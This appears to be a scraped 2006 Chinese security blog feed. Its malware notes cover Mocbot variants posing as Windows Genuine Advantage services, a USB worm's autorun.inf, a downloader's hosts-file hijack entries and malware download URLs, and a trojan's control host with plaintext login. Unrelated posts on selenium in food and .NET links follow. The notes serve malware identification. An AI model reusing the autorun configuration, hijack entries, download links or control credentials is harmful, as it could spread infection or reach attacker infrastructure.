bniu.househot.com
ypgw.wallloan.com


受影响的是WIN2000的系统。

两个变种的一些技术特征:
wgareg.exe (MD5: 9928a1e6601cf00d0b7826d13fb556f0)
服务名: wgareg
显示名: Windows Genuine Advantage Registration Service
描述: Ensures that your copy of Microsoft Windows is genuine and registered. Stopping or disabling this service will result in system instability.

wgavm.exe (MD5: 2bf2a4f0bdac42f4d6f8a062a7206797)
服务名: wgavm
显示名: Windows Genuine Advantage Validation Monitor
描述: Ensures that your copy of Microsoft Windows is genuine. Stopping or disabling this service will result in system instability.

以下是目前一些反病毒公司对于这两个变种的命名:

1. Trend Micro:WORM_IRCBOT.JK
                        WORM_IRCBOT.JL

2. F-Secure:IRCBot.st

3. Computer Associates:Win32/Cuebot.J

4. Mcafee:IRC-Mocbot!MS06-040

最后编辑: 小陌 编辑于2006/08/14 00:13
从今天上午开始,国内大量用户都遇到了一个相同的情况,出现“SVCHOST.EXE应用程序发生错误”的情况,同时我们也收到来自于台湾、香港、马来西亚等地区的报告,如图:

点击在新窗口中浏览此图片

点击在新窗口中浏览此图片

请出现此问题的朋友们尝试安装MS06-040补丁,看能否解决你们的问题。如果问题解决的话,请在我们帖子后留言,或者可以发送mail给我们,我们的mail地址是:cisrt@cisrt.com。

MS06-040补丁地址Server 服务中的漏洞可能允许远程执行代码 (921883)

同时建议广大网友检查你们的系统中是否含有wgareg.exewgavm.exe的两个文件以及服务项,如果存在的话,你们很可能已经中了Mocbot的变种。建议升级你们手中的杀毒软件进行杀毒!

hzq:

C:\WINDOWS\system32\wgareg.exe
C:\WINDOWS\Debug\dcpromo.log

听说有破坏系统墙现象,起床了再看,睡了。。

居然下载:hxxp://media.pixpond.com/l9rd6g.jpg/FSG

然后破坏一些系统(软件)配置

]]>
Mon,14 Aug 2006 00:53:02 CST 0
<![CDATA[推广一下“幸福的狮子”的“落雪专杀”MiscKiller]]> .html 本专杀工具可以清除“落雪”木马(Trojan.PSW.Misc)及一些变种病毒。

直接点击“杀毒”按钮即可查杀。由于一些杀毒软件杀毒后没有对注册表进行修复,本工具提供了注册表修复功能,可将注册表修复到系统默认状态。

如发现本工具无法查杀的“落雪”病毒变种,请将其加密压缩并发送至virusup@gmail.com

下载地址:http://www.cisrt.org/bbs/attachment.php?aid=42

               http://hzqedison.mm9mm.com/virus/MiscKiller.exe

]]> Sat,12 Aug 2006 08:48:13 CST 0 <![CDATA[Worm.Win32.Delf.aj wincfgs.exe KB20060111.exe]]> .html wincfgs.exe

UPX

CRC32:100A382A
MD5:07ADDDEF653A702B9A11EDBCEE07E82B

RECYCLER\RECYCLER\autorun.exe
RECYCLER\RECYCLER\desktop.ini
autorun.inf
USBSPY1.0
\wincfgs.exe

USBSpyRunMutex
\KB20060111.exe

[autorun]\r\nopen=.\\RECYCLER\\RECYCLER\\autorun.exe\r\n\r\nshell\\1=Open\r\nshell\\1\\Command=.\\RECYCLER\\RECYCLER\\autorun.exe\r\nshell\\2\\=Browser\r\nshell\\2\\Command=.\\RECYCLER\\RECYCLER\\autorun.exe\r\n\r\nshellexecute=.\\RECYCLER\\RECYCLER\\autorun.exe\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n

[.ShellClassInfo]\r\nCLSID={645FF040-5081-101B-9F08-00AA002F954E}\r\n

放的位置不错啊,连移动设备也不放过

]]>
Sat,05 Aug 2006 12:29:08 CST 0
<![CDATA[cq.exe cq1.exe cq2.exe]]> .html cq.exe

upx

CRC32:E596ED81

MD5:C45AB835DE548C7B033AD3BD4FAD47AF

AVP:Trojan-Downloader.Win32.Delf.asv

http://bbs.52happy.net/job.php?action=download&pid=tpc&tid=201215&aid=111949

http://down.136136.net/down/host.txt

drivers\etc\hosts
61.129.75.124    mir.100888290cs.com
61.129.75.124    woool.100888290cs.com
61.129.75.124    
www.mir5173.com
61.129.75.124    ert0003.e76.163ns.com
222.73.4.246    
www.chenshijituan.com
59.36.96.132    qq.etsoft.com.cn
127.0.0.1    eb114.net
127.0.0.1    
www.u7u.cn
61.129.75.124    www.wg581.com


http:/down.136136.net/down/
update
update\updatexd.exe
cq1.exe
update\updatexxd.exe
cq2.exe
update\updatexdxd.exe
cq3.exe
fuccvknet@1zxcvZC63.com

]]>
Sat,05 Aug 2006 09:18:17 CST 0
<![CDATA[like.bug.exe]]> .html bugserver.3322.org

user:jhjusr
password:jhJmY3C3Nc

C:\Tempbug.sys
like.bug.exe
vcltest3.dll
syslog.exe
~btempfile.exe
icobugtemp.ico

]]>
Fri,04 Aug 2006 16:05:59 CST 0
<![CDATA[学会关爱父母健康]]> .html 食补为最重要,不提倡什么保健品。。。。。。

硒的食物来源

    将硒作为维持人体正常生理功能的重要微量元素则历经了多年的研究。开始发现过多的硒对人体和牲畜有毒性。直到20世纪50年代有关硒的营养健康证据才逐渐积累起来。硒被摄人并被肠吸收后分布在肝、脾、肾及心脏等脏器中。

    人体血液中硒浓度为0.22微克/毫克。硒与蛋白质结合并在血液中运送到组织。少量的硒从粪便和汗中排出,但主要通过肾脏排泄。硒参与人体组织的代谢过程。硒参与构成谷胱甘肽过氧化物酶,可催化还原型的谷胱甘肽转化成氧化型的谷胱甘肽,防止过氧化氢及氧化物对细胞的损害。硒可以预防克山病。

    目前,某些人类种群资料和实验室实验说明硒可能有抗癌的生理功能。关于食物中的硒的含量,受各地土壤含硒量的影响很大。因此,缺硒地区和富硒地区植物含硒量可能有很大差异,通常了解食物中含硒量时应注意其产地。

    硒的丰富来源有芝麻、动物内脏、大蒜、蘑菇、海米、鲜贝、淡菜、金针菇、海参、鱿鱼、苋菜、鱼粉、黄油、啤酒酵母、小麦胚和龙虾。良好来源有海蟹、干贝、带鱼、松花鱼、黄鱼、龙虾、羊油、豆油、猪肾脏、全小麦粒(粉)、螃蟹、猪肉和羊肉。一般来源有小茴香、冬菇、桃酥、红萝卜、全燕麦粉、啤酒、大米、橘汁和全脂牛奶。微量来源有玉米、小米、核桃、奶油蛋糕、油饼、水果和糖。

]]>
Sun,30 Jul 2006 12:00:24 CST 0
<![CDATA[博客满天飞]]> .html 今天流行“博客”,漏洞也不少。。。。。。。。

百度测试阶段的漏洞

网络无安全可言。。。。。。

咱们要到月球上去了。。。。(月亮上面全是水,谁说的?

http://hi.baidu.com/

]]> Fri,28 Jul 2006 12:17:19 CST 0 <![CDATA[.NET学习实用网址]]> .html <>


名称:快速入门

地址:http://chs.gotdotnet.com/quickstart/

描述:本站点是微软.NET技术的快速入门网站,我们不必再安装.NET Framework中的快
速入门示例程序,直接在网上查看此示例即看。

****************************************************

名称:微软官方.NET指导站点

地址:http://www.gotdotnet.com/

描述:上面的站点是本站的一个子站点,本站点提供微软.NET官

方信息,并且有大量的用户源代码、控件下载,微软.NET开发组

的人员也经常在此站点发表一些指导性文章。

****************************************************

名称:SourceForge

地址:http://www.sourceforge.net

描述:世界上最大的Open Source项目在线网站,上面已经

有.NET的各种大型Open Source项目上千件,包括

SharpDevelop、NDoc、Mono等都是在此站点发布最新源代码信息。

****************************************************

名称:CodeProject

地址:http://www.codeproject.com

描述:很多非官方的中小型示例源代及文章,相当全面,基本上我们想要的各种方面的
资料都可以在此处查找。

****************************************************

名称:Fabrice's weblog 

地址:http://dotnetweblogs.com/FMARGUERIE/Story/4139.aspx

描述:这是一个WebLog形式的在线日志网站,定期更新,包括.NET相关的工具、混淆器
、反编译器等各种信息,十分值得收藏。

***********